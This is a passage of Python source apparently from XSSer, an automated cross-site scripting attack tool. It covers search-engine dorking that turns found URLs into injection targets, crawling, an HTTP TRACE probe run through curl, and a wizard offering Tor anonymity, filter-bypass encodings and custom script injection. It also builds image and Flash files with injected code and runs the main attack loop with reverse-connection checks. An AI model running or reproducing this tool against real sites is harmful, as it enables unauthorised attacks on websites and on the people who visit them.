 2153. self.report(" 2- Export results to files: \n\n - a) XSSreport.raw \n - b) XSSer_<target>_<datetime>.xml\n")
 2154. self.options.crawling = 99999 # set max num of urls to crawl
 2155. self.options.crawler_width = 5 # set max num of deeping levels
 2156. self.options.crawler_local = True # set crawlering range to local only
 2157. self.options.statistics = True # detailed output
 2158. self.options.timeout = 60 # timeout
 2159. self.options.retries = 2 # retries
 2160. self.options.delay = 5 # delay
 2161. self.options.threads = 10 # threads
 2162. self.options.followred = True # follow redirs
 2163. self.options.nohead = False # HEAD check
 2164. self.options.reversecheck = True # try to establish a reverse connection
 2165. self.options.fuzz = True # autofuzzing
 2166. self.options.coo = True # COO
 2167. self.options.xsa = True # XSA
 2168. self.options.xsr = True # XSR
 2169. self.options.dcp = True # DCP
 2170. self.options.dom = True # DOM
 2171. self.options.inducedcode = True # Induced
 2172. self.options.fileoutput = True # Important: export results to file (.raw)
 2173. self.options.filexml = "XSSer_" + str(self.options.target) + "_" + str(datetime.datetime.now())+".xml" # export xml
 2174. self.check_trace() # XST
 2175. urls = [options.target]
 2176. if options.url:
 2177. self.report('='*75)
 2178. self.report(str(p.version))
 2179. self.report('='*75)
 2180. if self.options.crawling:
 2181. self.report("Testing [XSS from CRAWLER]...")
 2182. else:
 2183. self.report("Testing [XSS from URL]...")
 2184. self.report('='*75)
 2185. urls = [options.url]
 2186. elif options.readfile:
 2187. self.report('='*75)
 2188. self.report(str(p.version))
 2189. self.report('='*75)
 2190. self.report("Testing [XSS from FILE]...")
 2191. self.report('='*75)
 2192. try:
 2193. f = open(options.readfile)
 2194. urls = f.readlines()
 2195. urls = [ line.replace('\n','') for line in urls ]
 2196. f.close()
 2197. except:
 2198. import os.path
 2199. if os.path.exists(options.readfile) == True:
 2200. self.report('\nThere are some errors opening the file: ', options.readfile, "\n")
 2201. else:
 2202. self.report('\nCannot found file: ', options.readfile, "\n")
 2203. elif options.dork: # dork a query
 2204. self.report('='*75)
 2205. self.report(str(p.version))
 2206. self.report('='*75)
 2207. self.report("Testing [XSS from DORK]... Good luck! ;-)")
 2208. self.report('='*75)
 2209. if options.dork_mass: # massive dorkering
 2210. for e in self.search_engines:
 2211. try:
 2212. dorker = Dorker(e)
 2213. urls = dorker.dork(options.dork)
 2214. i = 0
 2215. for u in urls: # replace original parameter for injection keyword (XSS)
 2216. p_uri = urlparse(u)
 2217. uri = p_uri.netloc
 2218. path = p_uri.path
 2219. target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
 2220. for key, value in target_params.items(): # parse params to apply keywords
 2221. for v in value:
 2222. target_params[key] = 'XSS'
 2223. target_url_params = urllib.parse.urlencode(target_params)
 2224. u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
 2225. urls[i] = u
 2226. i = i + 1
 2227. except Exception as e:
 2228. for reporter in self._reporters:
 2229. reporter.mosquito_crashed(dorker.search_url, str(e.message))
 2230. else:
 2231. if urls is not None:
 2232. for url in urls:
 2233. for reporter in self._reporters:
 2234. reporter.add_link(dorker.search_url, url)
 2235. else:
 2236. if not options.dork_engine:
 2237. options.dork_engine = 'duck' # default search engine [26-08/2019]
 2238. dorker = Dorker(options.dork_engine)
 2239. try:
 2240. urls = dorker.dork(options.dork)
 2241. i = 0
 2242. for u in urls: # replace original parameter for injection keyword (XSS)
 2243. p_uri = urlparse(u)
 2244. uri = p_uri.netloc
 2245. path = p_uri.path
 2246. target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
 2247. for key, value in target_params.items(): # parse params to apply keywords
 2248. for v in value:
 2249. target_params[key] = 'XSS'
 2250. target_url_params = urllib.parse.urlencode(target_params)
 2251. u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
 2252. urls[i] = u
 2253. i = i + 1
 2254. except Exception as e:
 2255. for reporter in self._reporters:
 2256. reporter.mosquito_crashed(dorker.search_url, str(e.message))
 2257. else:
 2258. if urls is not None:
 2259. for url in urls:
 2260. for reporter in self._reporters:
 2261. reporter.add_link(dorker.search_url, url)
 2262. elif options.dork_file: # dork from file ('core/fuzzing/dorks.txt')
 2263. self.report('='*75)
 2264. self.report(str(p.version))
 2265. self.report('='*75)
 2266. self.report("Testing [XSS from DORK]... Good luck! ;-)")
 2267. self.report('='*75)
 2268. try:
 2269. f = open('core/fuzzing/dorks.txt')
 2270. dorks = f.readlines()
 2271. dorks = [ dork.replace('\n','') for dork in dorks ]
 2272. f.close()
 2273. if not dorks:
 2274. print("\n[Error] - Imposible to retrieve 'dorks' from file.\n")
 2275. return
 2276. except:
 2277. if os.path.exists('core/fuzzing/dorks.txt') == True:
 2278. print('[Error] - Cannot open:', 'dorks.txt', "\n")
 2279. return
 2280. else:
 2281. print('[Error] - Cannot found:', 'dorks.txt', "\n")
 2282. return
 2283. if not options.dork_engine:
 2284. options.dork_engine = 'duck' # default search engine [26-08/2019]
 2285. if options.dork_mass: # massive dorkering
 2286. for e in self.search_engines:
 2287. try:
 2288. dorker = Dorker(e)
 2289. for dork in dorks:
 2290. urls = dorker.dork(dork)
 2291. i = 0
 2292. for u in urls: # replace original parameter for injection keyword (XSS)
 2293. p_uri = urlparse(u)
 2294. uri = p_uri.netloc
 2295. path = p_uri.path
 2296. target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
 2297. for key, value in target_params.items(): # parse params to apply keywords
 2298. for v in value:
 2299. target_params[key] = 'XSS'
 2300. target_url_params = urllib.parse.urlencode(target_params)
 2301. u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
 2302. urls[i] = u
 2303. i = i + 1
 2304. except Exception as e:
 2305. for reporter in self._reporters:
 2306. reporter.mosquito_crashed(dorker.search_url, str(e.message))
 2307. else:
 2308. if urls is not None:
 2309. for url in urls:
 2310. for reporter in self._reporters:
 2311. reporter.add_link(dorker.search_url, url)
 2312. else:
 2313. dorker = Dorker(options.dork_engine)
 2314. try:
 2315. for dork in dorks:
 2316. urls = dorker.dork(dork)
 2317. i = 0
 2318. for u in urls: # replace original parameter for injection keyword (XSS)
 2319. p_uri = urlparse(u)
 2320. uri = p_uri.netloc
 2321. path = p_uri.path
 2322. target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
 2323. for key, value in target_params.items(): # parse params to apply keywords
 2324. for v in value:
 2325. target_params[key] = 'XSS'
 2326. target_url_params = urllib.parse.urlencode(target_params)
 2327. u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
 2328. urls[i] = u
 2329. i = i + 1
 2330. except Exception as e:
 2331. for reporter in self._reporters:
 2332. reporter.mosquito_crashed(dorker.search_url, str(e.message))
 2333. else:
 2334. if urls is not None:
 2335. for url in urls:
 2336. for reporter in self._reporters:
 2337. reporter.add_link(dorker.search_url, url)
 2338. if options.crawling: # crawlering target(s)
 2339. nthreads = options.threads
 2340. self.crawled_urls = list(urls)
 2341. all_crawled = []
 2342. try:
 2343. self.options.crawling = int(self.options.crawling)
 2344. except:
 2345. self.options.crawling = 50
 2346. if self.options.crawler_width == None:
 2347. self.options.crawler_width = 2 # default crawlering-width
 2348. else:
 2349. try:
 2350. self.options.crawler_width = int(self.options.crawler_width)
 2351. except:
 2352. self.options.crawler_width = 2 # default crawlering-width
 2353. if self.options.crawler_local == None:
 2354. self.options.crawler_local = False # default crawlering to LOCAL
 2355. if self.options.crawling > 100:
 2356. warning_text = " -> (WARNING: It can take long time...)"
 2357. else:
 2358. warning_text = ""
 2359. for url in set(urls):
 2360. self.report("\n[Info] Crawlering TARGET:", url, "\n\n - Max. limit: "+ str(self.options.crawling)+warning_text+ " \n - Deep level: "+ str(options.crawler_width))
 2361. crawler = Crawler(self, Curl, all_crawled,
 2362. self.pool)
 2363. crawler.set_reporter(self)
 2364. # now wait for all results to arrive
 2365. while urls:
 2366. self.run_crawl(crawler, urls.pop(), options)
 2367. while not self._landing:
 2368. for reporter in self._reporters:
 2369. reporter.report_state('broad scanning')
 2370. try:
 2371. self.pool.poll()
 2372. except NoResultsPending:
 2373. crawler.cancel()
 2374. break
 2375. if len(self.crawled_urls) >= int(options.crawling) or not crawler._requests:
 2376. self.report("\n[Info] Found enough results... calling all mosquitoes to home!")
 2377. crawler.cancel()
 2378. break
 2379. time.sleep(0.1)
 2380. # re-parse crawled urls from main
 2381. parsed_crawled_urls = []
 2382. for u in self.crawled_urls:
 2383. if "XSS" in u:
 2384. parsed_crawled_urls.append(u)
 2385. else:
 2386. pass
 2387. self.crawled_urls = parsed_crawled_urls
 2388. # report parsed crawled urls
 2389. self.report("\n" + "-"*25)
 2390. self.report("\n[Info] Mosquitoes have found: [ " + str(len(self.crawled_urls)) + " ] possible attacking vector(s)")
 2391. if self.crawled_urls:
 2392. self.report("")
 2393. for u in self.crawled_urls:
 2394. if '/XSS' in u:
 2395. u = u.replace("/XSS", "")
 2396. self.report(" - " + str(u))
 2397. if not len(self.crawled_urls) > 0:
 2398. self.report("\n" + "-"*25)
 2399. self.report("\n[Error] XSSer (or your TARGET) is not working properly...\n\n - Wrong URL\n - Firewall\n - Proxy\n - Target offline\n - [?] ...\n")
 2400. else:
 2401. self.report("")
 2402. return self.crawled_urls
 2403. if not options.imx or not options.flash or not options.xsser_gtk or not options.update:
 2404. return urls
 2405. def run_crawl(self, crawler, url, options):
 2406. def _cb(request, result):
 2407. pass
 2408. def _error_cb(request, error):
 2409. for reporter in self._reporters:
 2410. reporter.mosquito_crashed(url, str(error[0]))
 2411. if DEBUG == True:
 2412. traceback.print_tb(error[2])
 2413. def crawler_main(args):
 2414. return crawler.crawl(*args)
 2415. crawler.crawl(url, int(options.crawler_width),
 2416. int(options.crawling),options.crawler_local)
 2417. def poll_workers(self):
 2418. try:
 2419. self.pool.poll()
 2420. except NoResultsPending:
 2421. pass
 2422. def try_running(self, func, error, args=[]):
 2423. """
 2424. Try running a function and print some error if it fails and exists with
 2425. a fatal error.
 2426. """
 2427. try:
 2428. return func(*args)
 2429. except Exception as e:
 2430. self.report(error)
 2431. if DEBUG == True:
 2432. traceback.print_exc()
 2433. def check_trace(self):
 2434. """
 2435. Check for Cross Site Tracing (XST) vulnerability:
 2436. 1) check HTTP TRACE method enabled (add 'Max-Forwards: 0' to curl command to bypass some 'Anti-antixst' web proxy rules)
 2437. 2) check data sent on reply
 2438. """
 2439. agents = [] # user-agents
 2440. try:
 2441. f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
 2442. except:
 2443. f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
 2444. for line in f:
 2445. agents.append(line)
 2446. agent = random.choice(agents).strip() # set random user-agent
 2447. referer = '127.0.0.1'
 2448. import subprocess, shlex
 2449. if not self.options.xst:
 2450. self.report("-"*25 + "\n")
 2451. self.report("[Info] REQUEST: Cross Site Tracing (XST) Vulnerability...\n")
 2452. if self.options.xst:
 2453. xst = subprocess.Popen(shlex.split('curl -q -s -i -m 30 -A ' + agent + ' -e ' + referer + ' -X TRACE -N ' + self.options.xst), stdout=subprocess.PIPE)
 2454. if self.options.target:
 2455. xst = subprocess.Popen(shlex.split('curl -q -s -i -m 30 -A ' + agent + ' -e ' + referer + ' -X TRACE -N ' + self.options.target), stdout=subprocess.PIPE)
 2456. line1 = xst.stdout.read().decode('utf-8')
 2457. if self.options.verbose:
 2458. if line1 != '':
 2459. self.report("[Info] Reply:", line1.rstrip())
 2460. self.report("")
 2461. if "405 Not Allowed" in line1.rstrip() or "405 Method Not Allowed" in line1.rstrip():
 2462. self.report("[Info] REPLY: Target is NOT vulnerable...\n")
 2463. elif "TRACE / HTTP" in line1.rstrip():
 2464. self.report("[Info] REPLY: Target is vulnerable to XST!\n")
 2465. else:
 2466. self.report("[Info] REPLY: Target is NOT vulnerable...\n")
 2467. if self.options.target:
 2468. self.report('='*75)
 2469. def start_wizard(self):
 2470. """
 2471. Start Wizard Helper
 2472. """
 2473. #step 0: Menu
 2474. ans1=True
 2475. ans2=True
 2476. ans3=True
 2477. ans4=True
 2478. ans5=True
 2479. ans6=True
 2480. #step 1: Where
 2481. while ans1:
 2482. print("""\nA)- Where are your targets?\n
 2483. [1]- I want to enter the url of my target directly.
 2484. [2]- I want to enter a list of targets from a .txt file.
 2485. *[3]- I don't know where are my target(s)... I just want to explore! :-)
 2486. [e]- Exit/Quit/Abort.
 2487. """)
 2488. ans1 = input("Your choice: [1], [2], [3] or [e]xit\n")
 2489. if ans1 == "1": # from url
 2490. url = input("Target url (ex: http(s)://target.com): ")
 2491. if url.startswith("http"):
 2492. ans1 = None
 2493. else:
 2494. print("\n[Error] Your url is not valid!. Try again!")
 2495. pass
 2496. elif ans1 == "2": # from file
 2497. url = input("Path to file (ex: 'targets_list.txt'): ")
 2498. if url == None:
 2499. print("\n[Error] Your are not providing a valid file. Try again!")
 2500. pass
 2501. else:
 2502. ans1 = None
 2503. elif ans1 == "3": # dorking
 2504. url = "DORKING"
 2505. ans1 = None
 2506. elif (ans1 == "e" or ans1 == "E"):
 2507. print("Closing wizard...")
 2508. ans1=None
 2509. ans2=None
 2510. ans3=None
 2511. ans4=None
 2512. ans5=None
 2513. ans6=None
 2514. else:
 2515. print("\nNot valid choice. Try again!")
 2516. #step 2: How
 2517. while ans2:
 2518. print(22*"-")
 2519. print("""\nB)- How do you want to connect?\n
 2520. [1]- I want to connect using GET and select some possible vulnerable parameter(s) directly.
 2521. [2]- I want to connect using POST and select some possible vulnerable parameter(s) directly.
 2522. [3]- I want to "crawl" all the links of my target(s) to found as much vulnerabilities as possible.
 2523. *[4]- I don't know how to connect... Just do it! :-)
 2524. [e]- Exit/Quit/Abort.
 2525. """)
 2526. ans2 = input("Your choice: [1], [2], [3], [4] or [e]xit\n")
 2527. if ans2 == "1": # using GET
 2528. payload = input("GET payload (ex: '/menu.php?q='): ")
 2529. if payload == None:
 2530. print("\n[Error] Your are providing an empty payload. Try again!")
 2531. pass
 2532. else:
 2533. self.user_template_conntype = "GET"
 2534. ans2 = None
 2535. elif ans2 == "2": # using POST
 2536. payload = input("POST payload (ex: 'foo=1&bar='): ")
 2537. if payload == None:
 2538. print("\n[Error] Your are providing an empty payload. Try again!")
 2539. pass
 2540. else:
 2541. self.user_template_conntype = "POST"
 2542. ans2 = None
 2543. elif ans2 == "3": # crawlering
 2544. payload = "CRAWLER"
 2545. ans2 = None
 2546. elif ans2 == "4": # crawlering
 2547. payload = "CRAWLER"
 2548. ans2 = None
 2549. elif (ans2 == "e" or ans2 == "E"):
 2550. print("Closing wizard...")
 2551. ans2=None
 2552. ans3=None
 2553. ans4=None
 2554. ans5=None
 2555. ans6=None
 2556. else:
 2557. print("\nNot valid choice. Try again!")
 2558. #step 3: Proxy
 2559. while ans3:
 2560. print(22*"-")
 2561. print("""\nC)- Do you want to be 'anonymous'?\n
 2562. [1]- Yes. I want to use my proxy and apply automatic spoofing methods.
 2563. [2]- Anonymous?. Yes!!!. I have a TOR proxy ready at: http://127.0.0.1:8118.
 2564. *[3]- Yes. But I haven't any proxy. :-)
 2565. [4]- No. It's not a problem for me to connect directly to the target(s).
 2566. [e]- Exit/Quit.
 2567. """)
 2568. ans3 = input("Your choice: [1], [2], [3], [4] or [e]xit\n")
 2569. if ans3 == "1": # using PROXY + spoofing
 2570. proxy = input("Enter proxy [http(s)://server:port]: ")
 2571. ans3 = None
 2572. elif ans3 == "2": # using TOR + spoofing
 2573. proxy = 'Using TOR (default: http://127.0.0.1:8118)'
 2574. proxy = 'http://127.0.0.1:8118'
 2575. ans3 = None
 2576. elif ans3 == "3": # only spoofing
 2577. proxy = 'Proxy: No - Spoofing: Yes'
 2578. ans3 = None
 2579. elif ans3 == "4": # no spoofing
 2580. proxy = 'Proxy: No - Spoofing: No'
 2581. ans3 = None
 2582. elif (ans3 == "e" or ans3 == "E"):
 2583. print("Closing wizard...")
 2584. ans3=None
 2585. ans4=None
 2586. ans5=None
 2587. ans6=None
 2588. else:
 2589. print("\nNot valid choice. Try again!")
 2590. #step 4: Bypasser(s)
 2591. while ans4:
 2592. print(22*"-")
 2593. print("""\nD)- Which 'bypasser(s' do you want to use?\n
 2594. [1]- I want to inject XSS scripts without any encoding.
 2595. [2]- Try to inject code using 'Hexadecimal'.
 2596. [3]- Try to inject code mixing 'String.FromCharCode()' and 'Unescape()'.
 2597. [4]- I want to inject using 'Character Encoding Mutations' (Une+Str+Hex).
 2598. *[5]- I don't know exactly what is a 'bypasser'... But I want to inject code! :-)
 2599. [e]- Exit/Quit.
 2600. """)
 2601. ans4 = input("Your choice: [1], [2], [3], [4], [5] or [e]xit\n")
 2602. if ans4 == "1": # no encode
 2603. enc = "Not using encoders"
 2604. ans4 = None
 2605. elif ans4 == "2": # enc: Hex
 2606. enc = 'Hex'
 2607. ans4 = None
 2608. elif ans4 == "3": # enc: Str+Une
 2609. enc = 'Str+Une'
 2610. ans4 = None
 2611. elif ans4 == "4": # enc: Mix: Une+Str+Hex
 2612. enc = "Une,Str,Hex"
 2613. ans4 = None
 2614. elif ans4 == "5": # enc: no encode
 2615. enc = 'Not using encoders'
 2616. ans4 = None
 2617. elif (ans4 == "e" or ans4 == "E"):
 2618. print("Closing wizard...")
 2619. ans4=None
 2620. ans5=None
 2621. ans6=None
 2622. else:
 2623. print("\nNot valid choice. Try again!")
 2624. #step 5: Exploiting
 2625. while ans5:
 2626. print(22*"-")
 2627. print("""\nE)- Which final code do you want to 'exploit' on vulnerabilities found?\n
 2628. [1]- I want to inject a classic "Alert" message box.
 2629. [2]- I want to inject my own scripts.
 2630. *[3]- I don't want to inject a final code... I just want to discover vulnerabilities! :-)
 2631. [e]- Exit/Quit.
 2632. """)
 2633. ans5 = input("Your choice: [1], [2], [3] or [e]xit\n")
 2634. if ans5 == "1": # alertbox
 2635. script = 'Alertbox'
 2636. ans5 = None
 2637. elif ans5 == "2": # manual
 2638. script = input("Enter code (ex: '><script>alert('XSS');</script>): ")
 2639. if script == None:
 2640. print("\n[Error] Your are providing an empty script to inject. Try again!")
 2641. pass
 2642. else:
 2643. ans5 = None
 2644. elif ans5 == "3": # no exploit
 2645. script = 'Not exploiting code'
 2646. ans5 = None
 2647. elif (ans5 == "e" or ans5 == "E"):
 2648. print("Closing wizard...")
 2649. ans5=None
 2650. ans6=None
 2651. else:
 2652. print("\nNot valid choice. Try again!")
 2653. #step 6: Final
 2654. while ans6:
 2655. print(22*"-")
 2656. print("\nVery nice!. That's all. Your last step is to -accept or not- this template.\n")
 2657. print("A)- Target:", url)
 2658. print("B)- Payload:", payload)
 2659. print("C)- Privacy:", proxy)
 2660. print("D)- Bypasser(s):", enc)
 2661. print("E)- Final:", script)
 2662. print("""
 2663. [Y]- Yes. Accept it and start testing!.
 2664. [N]- No. Abort it?.
 2665. """)
 2666. ans6 = input("Your choice: [Y] or [N]\n")
 2667. if (ans6 == "y" or ans6 == "Y"): # YES
 2668. start = 'YES'
 2669. print('Good fly... and happy "Cross" hacking !!! :-)\n')
 2670. ans6 = None
 2671. elif (ans6 == "n" or ans6 == "N"): # NO
 2672. start = 'NO'
 2673. print("Aborted!. Closing wizard...")
 2674. ans6 = None
 2675. else:
 2676. print("\nNot valid choice. Try again!")
 2677. if url and payload and proxy and enc and script:
 2678. return url, payload, proxy, enc, script
 2679. else:
 2680. return
 2681. def create_fake_image(self, filename, payload):
 2682. """
 2683. Create -fake- image with code injected
 2684. """
 2685. options = self.options
 2686. filename = options.imx
 2687. payload = options.script
 2688. image_xss_injections = ImageInjections()
 2689. image_injections = image_xss_injections.image_xss(options.imx , options.script)
 2690. return image_injections
 2691. def create_fake_flash(self, filename, payload):
 2692. """
 2693. Create -fake- flash movie (.swf) with code injected
 2694. """
 2695. options = self.options
 2696. filename = options.flash
 2697. payload = options.script
 2698. flash_xss_injections = FlashInjections()
 2699. flash_injections = flash_xss_injections.flash_xss(options.flash, options.script)
 2700. return flash_injections
 2701. def create_gtk_interface(self):
 2702. """
 2703. Create GTK Interface
 2704. """
 2705. options = self.options
 2706. from core.gtkcontroller import Controller, reactor
 2707. uifile = "xsser.ui"
 2708. controller = Controller(uifile, self)
 2709. self._reporters.append(controller)
 2710. if reactor:
 2711. reactor.run()
 2712. else:
 2713. from gi.repository import Gtk
 2714. Gtk.main()
 2715. return controller
 2716. def run(self, opts=None):
 2717. """
 2718. Run xsser.
 2719. """
 2720. self.token_arrived_flag = False # used for --reverse-check
 2721. self.success_arrived_flag = False # used for --reverse-check
 2722. self.token_arrived_hash = None # used for --reverse-check
 2723. self.token_arrived_hashes = [] # used for --reverse-check
 2724. for reporter in self._reporters:
 2725. reporter.start_attack()
 2726. if opts:
 2727. options = self.create_options(opts)
 2728. self.set_options(options)
 2729. if not self.hub:
 2730. self.hub = HubThread(self)
 2731. self.hub.start()
 2732. options = self.options
 2733. if options:
 2734. if self.options.hash is True: # not fuzzing/heuristic when hash precheck
 2735. self.options.fuzz = False
 2736. self.options.script = False
 2737. self.options.coo = False
 2738. self.options.xsa = False
 2739. self.options.xsr = False
 2740. self.options.dcp = False
 2741. self.options.dom = False
 2742. self.options.inducedcode = False
 2743. self.options.heuristic = False
 2744. if self.options.heuristic: # not fuzzing/hash when heuristic precheck
 2745. self.options.fuzz = False
 2746. self.options.script = False
 2747. self.options.coo = False
 2748. self.options.xsa = False
 2749. self.options.xsr = False
 2750. self.options.dcp = False
 2751. self.options.dom = False
 2752. self.options.inducedcode = False
 2753. self.options.hash = False
 2754. if self.options.Cem: # parse input at CEM for blank spaces
 2755. self.options.Cem = self.options.Cem.replace(" ","")
 2756. else:
 2757. pass
 2758. try:
 2759. if self.options.imx: # create -fake- image with code injected
 2760. p = self.optionParser
 2761. self.report('='*75)
 2762. self.report(str(p.version))
 2763. self.report('='*75)
 2764. self.report("[Image XSS Builder]...")
 2765. self.report('='*75)
 2766. self.report(''.join(self.create_fake_image(self.options.imx, self.options.script)))
 2767. self.report('='*75 + "\n")
 2768. except:
 2769. return
 2770. if options.flash: # create -fake- flash movie (.swf) with code injected
 2771. p = self.optionParser
 2772. self.report('='*75)
 2773. self.report(str(p.version))
 2774. self.report('='*75)
 2775. self.report("[Flash Attack! XSS Builder]...")
 2776. self.report('='*75)
 2777. self.report(''.join(self.create_fake_flash(self.options.flash, self.options.script)))
 2778. self.report('='*75 + "\n")
 2779. if options.xsser_gtk:
 2780. self.create_gtk_interface()
 2781. return
 2782. if self.options.wizard: # start a wizard helper
 2783. p = self.optionParser
 2784. self.report('='*75)
 2785. self.report(str(p.version))
 2786. self.report('='*75)
 2787. self.report("[Wizard] Generating XSS attack...")
 2788. self.report('='*75)
 2789. self.user_template = self.start_wizard()
 2790. if self.options.xst: # check for cross site tracing
 2791. p = self.optionParser
 2792. if not self.options.target:
 2793. self.report('='*75)
 2794. self.report(str(p.version))
 2795. self.report('='*75)
 2796. self.report("[XST Attack!] Checking for -HTTP TRACE- method ...")
 2797. self.report('='*75+"\n")
 2798. self.check_trace()
 2799. if self.options.reversecheck or self.options.dom: # generate headless embed web browser
 2800. self.driver = self.create_headless_embed_browser()
 2801. if self.driver == None:
 2802. print("\n[Error] Importing: firefoxdriver lib. \n\n To install it on Debian based systems:\n\n $ 'sudo apt-get install firefoxdriver'")
 2803. print("\n[Error] Options: '--reverse-check' and '--Dom' will be aborted...\n")
 2804. self.options.reversecheck = None # aborting '--reverse-check' connection
 2805. self.options.dom = None # aborting '--Dom' injections
 2806. if options.checktor:
 2807. url = self.check_tor_url # TOR status checking site
 2808. print('='*75)
 2809. print("")
 2810. print(" _ ")
 2811. print(" /_/_ .'''. ")
 2812. print(" =O(_)))) ...' `. ")
 2813. print(" \_\ `. .'''")
 2814. print(" `..' ")
 2815. print("")
 2816. print('='*75)
 2817. agents = [] # user-agents
 2818. try:
 2819. f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
 2820. except:
 2821. f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
 2822. for line in f:
 2823. agents.append(line)
 2824. agent = random.choice(agents).strip() # set random user-agent
 2825. referer = "127.0.0.1"
 2826. print("\n[Info] Sending request to: " + url + "\n")
 2827. print("-"*25+"\n")
 2828. headers = {'User-Agent' : agent, 'Referer' : referer} # set fake user-agent and referer
 2829. try:
 2830. req = urllib.request.Request(url, None, headers)
 2831. tor_reply = urllib.request.urlopen(req).read().decode('utf-8')
 2832. your_ip = tor_reply.split('<strong>')[1].split('</strong>')[0].strip() # extract public IP
 2833. if not tor_reply or 'Congratulations' not in tor_reply:
 2834. print("It seems that Tor is not properly set.\n")
 2835. print("IP address appears to be: " + your_ip + "\n")
 2836. else:
 2837. print("Congratulations!. Tor is properly being used :-)\n")
 2838. print("IP address appears to be: " + your_ip + "\n")
 2839. except:
 2840. print("[Error] Cannot reach TOR checker system!. Are you connected?\n")
 2841. sys.exit(2) # return
 2842. # step 0: get workers
 2843. nthreads = max(1, abs(options.threads))
 2844. nworkers = len(self.pool.workers)
 2845. if nthreads != nworkers:
 2846. if nthreads < nworkers:
 2847. self.pool.dismissWorkers(nworkers-nthreads)
 2848. else:
 2849. self.pool.createWorkers(nthreads-nworkers)
 2850. for reporter in self._reporters:
 2851. reporter.report_state('scanning')
 2852. # step 1: get urls
 2853. urls = self.try_running(self._get_attack_urls, "\n[Error] WARNING: Some internal errors getting -targets-\n")
 2854. for reporter in self._reporters:
 2855. reporter.report_state('arming')
 2856. # step 2: get payloads
 2857. payloads = self.try_running(self.get_payloads, "\n[Error] WARNING: Some internal errors getting -payloads-\n")
 2858. for reporter in self._reporters:
 2859. reporter.report_state('cloaking')
 2860. if options.Dwo:
 2861. payloads = self.process_payloads_ipfuzzing(payloads)
 2862. elif options.Doo:
 2863. payloads = self.process_payloads_ipfuzzing_octal(payloads)
 2864. for reporter in self._reporters:
 2865. reporter.report_state('locking targets')
 2866. # step 3: get query string
 2867. query_string = self.try_running(self.get_query_string, "\n[Error] WARNING: Some internal problems getting query -string-\n")
 2868. for reporter in self._reporters:
 2869. reporter.report_state('sanitize')
 2870. urls = self.sanitize_urls(urls)
 2871. for reporter in self._reporters:
 2872. reporter.report_state('attack')
 2873. # step 4: perform attack
 2874. self.try_running(self.attack, "\n[Error] WARNING: Some internal problems running attack...\n", (urls, payloads, query_string))
 2875. for reporter in self._reporters:
 2876. reporter.report_state('reporting')
 2877. if len(self.final_attacks):
 2878. self.report("[Info] Waiting for tokens to arrive...")
 2879. while self._ongoing_requests and not self._landing:
 2880. if not self.pool:
 2881. self.mothership.poll_workers()
 2882. else:
 2883. self.poll_workers()
 2884. time.sleep(0.2)
 2885. for reporter in self._reporters:
 2886. reporter.report_state('final sweep...')
 2887. if self.pool:
 2888. self.pool.dismissWorkers(len(self.pool.workers))
 2889. self.pool.joinAllDismissedWorkers()
 2890. start = time.time()
 2891. while not self._landing and len(self.final_attacks) and time.time() - start < 5.0:
 2892. time.sleep(0.2)
 2893. for reporter in self._reporters:
 2894. reporter.report_state('landing... '+str(int(5.0 - (time.time() - start))))
 2895. if self.final_attacks and self.options.reversecheck: # try a --reverse-check
 2896. final_attack_payloads = []
 2897. self.report("="*45)
 2898. self.report("[*] Reverse Check(s) Results:")
 2899. self.report("="*45 + "\n")
 2900. for final_attack in self.final_attacks.values():
 2901. if final_attack not in final_attack_payloads:
 2902. final_attack_payloads.append(final_attack)
 2903. for final in final_attack_payloads:
 2904. if self.hash_found:
 2905. for l in self.hash_found:
 2906. hashing = l[3]
 2907. for k, v in final.items():
 2908. if 'success/'+hashing in v: # find XSS "remote poison" payload!
 2909. if not self.options.postdata: # GET
 2910. self.report("[Info] Generating 'XSS Tunneling' [HTTP GET] exploit:\n")
 2911. else: # POST
 2912. self.report("[Info] Generating 'XSS Tunneling' [HTTP POST] exploit:\n")
 2913. if "#http://localhost:19084/success/"+str(hashing) in v: # re-parsing injected params for POST
 2914. v = v.replace("#http://localhost:19084/success/"+str(hashing), "")
 2915. if "<script>document.location=document.location.hash.substring(1)</script>" in v:
 2916. v = v.replace("<script>document.location=document.location.hash.substring(1)", "<script src='http://localhost:19084/success/"+str(hashing)+"'>")
 2917. self.report(v , "\n")
 2918. self.report("-"*25+"\n")
 2919. self.token_arrived_flag, self.success_arrived_flag, self.token_arrived_hash = self.hub.check_hash(hashing) # validate hashes (client+server)
 2920. if self.token_arrived_flag == True and self.token_arrived_hash:
 2921. self.report("[Info] Validating HASHES:\n")
 2922. if self.success_arrived_flag == False:
 2923. self.report(" INJECTED: [", hashing, "] <-> RECEIVED: [", self.token_arrived_hash, "] -> [OK!]\n")
 2924. else:
 2925. self.report(" INJECTED: [", hashing, "] <-> RECEIVED: [KEYWORD: '/success/' via remote Cross URL Injection] -> [OK!]\n")
 2926. self.report("-"*25+"\n")
 2927. if self.options.postdata: # POST
 2928. self.report("[Info] XSS [HTTP POST] VECTOR [100% VULNERABLE] FOUND!:\n\n|-> "+"".join(self.successful_urls), "(POST:", query_string + ")\n")
 2929. else: # GET
 2930. self.report("[Info] XSS [HTTP GET] VECTOR [100% VULNERABLE] FOUND!:\n\n|-> "+"".join(self.successful_urls), "\n")
 2931. self.token_arrived_hashes.append(self.token_arrived_hash) # add token arrived hashes for counting
 2932. else:
 2933. self.report("[Error] Remote XSS exploit [--reverse-check] has FAILED! -> [PASSING!]\n")
 2934. self.report("-"*25+"\n")
 2935. if self.options.reversecheck or self.options.dom:
 2936. try:
 2937. self.driver.close() # end headless embed web browser driver!
 2938. except:
 2939. try:
 2940. self.driver.quit() # try quit()
 2941. except:
 2942. pass
 2943. for reporter in self._reporters:
 2944. reporter.end_attack() # end reports
 2945. if self.mothership:
 2946. self.mothership.remove_reporter(self) # end mothership
 2947. if self.hub:
 2948. self.land() # end token hub server
 2949. self.print_results()
 2950. def sanitize_urls(self, urls):
 2951. all_urls = set()
 2952. if urls is not None:
 2953. for url in urls:
 2954. if url.startswith("http://") or url.startswith("https://"):
 2955. self.urlspoll.append(url)
